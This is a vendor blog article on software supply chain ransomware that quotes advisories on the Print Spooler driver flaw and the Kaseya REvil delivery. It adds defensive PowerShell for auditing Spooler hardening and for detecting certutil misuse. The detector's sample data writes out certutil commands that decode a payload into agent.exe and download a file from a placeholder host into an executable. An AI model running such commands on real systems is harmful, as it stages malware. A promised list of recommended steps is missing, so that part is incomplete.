Software supply chain ransomware attacks have increased dramatically in recent months, but few people understand the underlying factors that are drawing cybercriminals to supply chain vulnerabilities.
Source: Advanced control services
Modern software and systems development has become very complex. A product typically relies on several suppliers providing many pre-packaged, open-source modules, frameworks, or services that are needed to build the end software product or system.
Developers use these modules and services to accelerate development and to be more efficient and cost-effective. Pre-packaged software is integrated through APIs, service calls, drivers, or other integration mechanisms.
For example, a large technology organization hires third-party contractors to carry out routine website updates and gives these contractors access to its intranet or network. In many cases, the third parties themselves subcontract some of the work to other third parties.
When everything is said and done, many components and providers contribute to the development of one software product or system. Each of these integrated components adds a level of security risk to the end product.
Microsoft Windows 11 Print Spooler supply chain attack
“The RpcAddPrinterDriverEx() function is used to install a printer driver on a system. One of the parameters to this function is the DRIVER_CONTAINER object, which contains information about which driver is to be used by the added printer. The other argument, dwFileCopyFlags, specifies how replacement printer driver files are to be copied. An attacker can take advantage of the fact that any authenticated user can call RpcAddPrinterDriverEx() and specify a driver file that lives on a remote server. This results in the Print Spooler service spoolsv.exe executing code in an arbitrary DLL file with SYSTEM privileges.” (Source: CISA.org)
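The excerpt names the exposure precisely: any authenticated user can reach RpcAddPrinterDriverEx() and point it at a driver file on a remote server, and spoolsv.exe loads it as SYSTEM. The PowerShell below is an added example, not code from this article, from CISA or from Microsoft, that audits the controls a defender can set against exactly that: whether the Spooler service runs at all, whether it still accepts remote RPC clients, and the Point and Print policy values from Microsoft's published mitigation guidance for this vulnerability (RestrictDriverInstallationToAdministrators, NoWarningNoElevationOnInstall, UpdatePromptSettings and RegisterSpoolerRemoteRpcEndPoint). Those registry names and the hardened values come from that guidance rather than from the page; the function names are my own. The check is read-only and should be run in an elevated session on the host being reviewed.

```powershell
# Added example: audit Print Spooler exposure to remote driver installation.
# Registry paths and values are Microsoft's published mitigations for the
# RpcAddPrinterDriverEx() issue described above; the function names are made up here.

$PointAndPrintKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$PrintersKey      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'

function Get-RegistryDword {
    param([string]$Path, [string]$Name)
    try {
        (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name
    } catch {
        $null   # key or value absent: reported as "not configured"
    }
}

function Test-PrintSpoolerHardening {
    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Is the service present and running? Hosts that never print (domain
    #    controllers, most servers) should have it stopped and disabled.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($null -eq $spooler) {
        $findings.Add([pscustomobject]@{ Check = 'Spooler service'; Status = 'Pass'; Detail = 'Service not present' })
    } elseif ($spooler.Status -eq 'Running') {
        $findings.Add([pscustomobject]@{ Check = 'Spooler service'; Status = 'Review'; Detail = 'Running; disable on hosts that do not need to print' })
    } else {
        $findings.Add([pscustomobject]@{ Check = 'Spooler service'; Status = 'Pass'; Detail = "Status $($spooler.Status), start type $($spooler.StartType)" })
    }

    # 2. Policy values. RestrictDriverInstallationToAdministrators=1 makes driver
    #    installation (the RpcAddPrinterDriverEx() path) require administrator
    #    rights; the two Point and Print values keep warning and elevation prompts
    #    enabled; RegisterSpoolerRemoteRpcEndPoint=2 stops the spooler from
    #    accepting remote RPC clients. 'Absent' is the verdict when the value is
    #    not configured at all.
    $expected = @(
        @{ Path = $PointAndPrintKey; Name = 'RestrictDriverInstallationToAdministrators'; Want = 1; Absent = 'Review' },
        @{ Path = $PointAndPrintKey; Name = 'NoWarningNoElevationOnInstall';               Want = 0; Absent = 'Pass' },
        @{ Path = $PointAndPrintKey; Name = 'UpdatePromptSettings';                        Want = 0; Absent = 'Pass' },
        @{ Path = $PrintersKey;      Name = 'RegisterSpoolerRemoteRpcEndPoint';            Want = 2; Absent = 'Review' }
    )

    foreach ($v in $expected) {
        $actual = Get-RegistryDword -Path $v.Path -Name $v.Name
        if ($null -eq $actual) {
            $status = $v.Absent; $detail = 'Not configured'
        } elseif ($actual -eq $v.Want) {
            $status = 'Pass';    $detail = "Value $actual"
        } else {
            $status = 'Fail';    $detail = "Value $actual, expected $($v.Want)"
        }
        $findings.Add([pscustomobject]@{ Check = $v.Name; Status = $status; Detail = $detail })
    }

    return $findings
}

Test-PrintSpoolerHardening | Format-Table -AutoSize
```

An absent RestrictDriverInstallationToAdministrators is reported as Review rather than Pass on purpose: only hosts carrying the August 2021 cumulative update default to administrator-only driver installation, so on an unpatched host the missing value means any authenticated user can still add a driver.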
Kaseya supply chain attack
“The threat actor behind this attack identified and exploited a zero-day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypts files on the affected systems.
certutil.exe is used to decode the Base64-encoded payload located in agent.crt and writes the result to an executable file named agent.exe in the working directory of Kaseya. The Windows batch script then executes the agent.exe file, which will create and launch the REvil ransomware payload.” (Source: Zscaler Inc.)
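The Zscaler excerpt gives the one observable that matters for detection: certutil.exe, a signed Windows binary, used to decode a Base64 blob into an executable that a batch script then launches. The PowerShell below is an added example, not code from this article, from Zscaler or from Kaseya, that runs that detection logic over a few constructed process-creation records. The records carry the Image, CommandLine and ParentImage fields of a Sysmon Event ID 1 or Security 4688 event but are made up for this example, and the working-directory path in them is a placeholder. The function flags certutil decoding into an executable extension, certutil used as a downloader with -urlcache -f, and the agent.crt/agent.exe file names quoted above.

```powershell
# Added example: detect certutil.exe being used as a decoder or downloader.
# $SampleEvents are constructed records, not real telemetry; the directory
# C:\Kaseya\working is a placeholder for the agent's working directory.

$SampleEvents = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'
                       CommandLine = 'certutil -decode C:\Kaseya\working\agent.crt C:\Kaseya\working\agent.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'
                       CommandLine = 'certutil -verify -urlfetch C:\Temp\server.cer'
                       ParentImage = 'C:\Windows\System32\cmd.exe' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'
                       CommandLine = 'certutil.exe -urlcache -split -f http://example.invalid/drop.png C:\Users\Public\update.exe'
                       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' },
    [pscustomobject]@{ Image = 'C:\Program Files\Vendor\app.exe'
                       CommandLine = 'app.exe /quiet'
                       ParentImage = 'C:\Windows\explorer.exe' }
)

function Find-SuspiciousCertutil {
    param([Parameter(Mandatory)][object[]]$Events)

    # Output extensions that certutil has no legitimate reason to produce.
    $executableExt = '\.(exe|dll|scr|com|ps1|bat|cmd|vbs|js)(\s|"|$)'

    foreach ($e in $Events) {
        # Only certutil invocations are of interest; the comparison is case-insensitive.
        if ([System.IO.Path]::GetFileName($e.Image) -ne 'certutil.exe') { continue }
        $cl = $e.CommandLine
        $reasons = @()

        # Base64/hex decode whose destination is an executable file.
        if ($cl -match '(^|\s)-(decode|decodehex)(\s|$)' -and $cl -match $executableExt) {
            $reasons += 'certutil decoding a payload to an executable'
        }
        # certutil acting as a downloader (-urlcache -f <url> <file>).
        if ($cl -match '(^|\s)-urlcache(\s|$)' -and $cl -match '(^|\s)-f(\s|$)') {
            $reasons += 'certutil used as a downloader (-urlcache -f)'
        }
        # File names reported for the Kaseya REvil delivery script.
        if ($cl -match 'agent\.crt|agent\.exe') {
            $reasons += 'file names match the Kaseya REvil delivery script'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Parent      = $e.ParentImage
                CommandLine = $cl
                Reason      = ($reasons -join '; ')
            }
        }
    }
}

# Expected: the first and third sample records are flagged; the -verify and app.exe
# records are not.
Find-SuspiciousCertutil -Events $SampleEvents | Format-List
```

To run the same logic on live hosts, feed it events from Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } mapped onto the three fields above. The -verify record is deliberately included as a benign case: certutil legitimately touches certificate files, so the detection keys on the decode-to-executable and download switches rather than on the binary alone.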
These are two examples of simple software supply chain ransomware attacks that had devastating results for thousands of companies. It is also important to review other prevention methods: https://hackerstrike.com/ransomware-prevention-and-protection-measures/
In general, every organization should have clear and consistent security protocols such as strong password management, firewalls, intrusion prevention systems, etc. However, when dealing with software supply chain ransomware attacks, organizations must go well beyond traditional cybersecurity practices. Some of the steps recommended to reduce the risks from this attack vector are:
The increasing frequency of ransomware attacks makes it likely that your organization will be a victim if it hasn't been already.
In addition to the recommendations mentioned above, I believe that detecting and blocking unexpected behaviors is the best way to prevent these attacks. As a result, organizations should review whether their current security tools are capable of detecting and blocking software supply chain attacks.
By Ralph Aceves
CEO, HackerStrike Corporation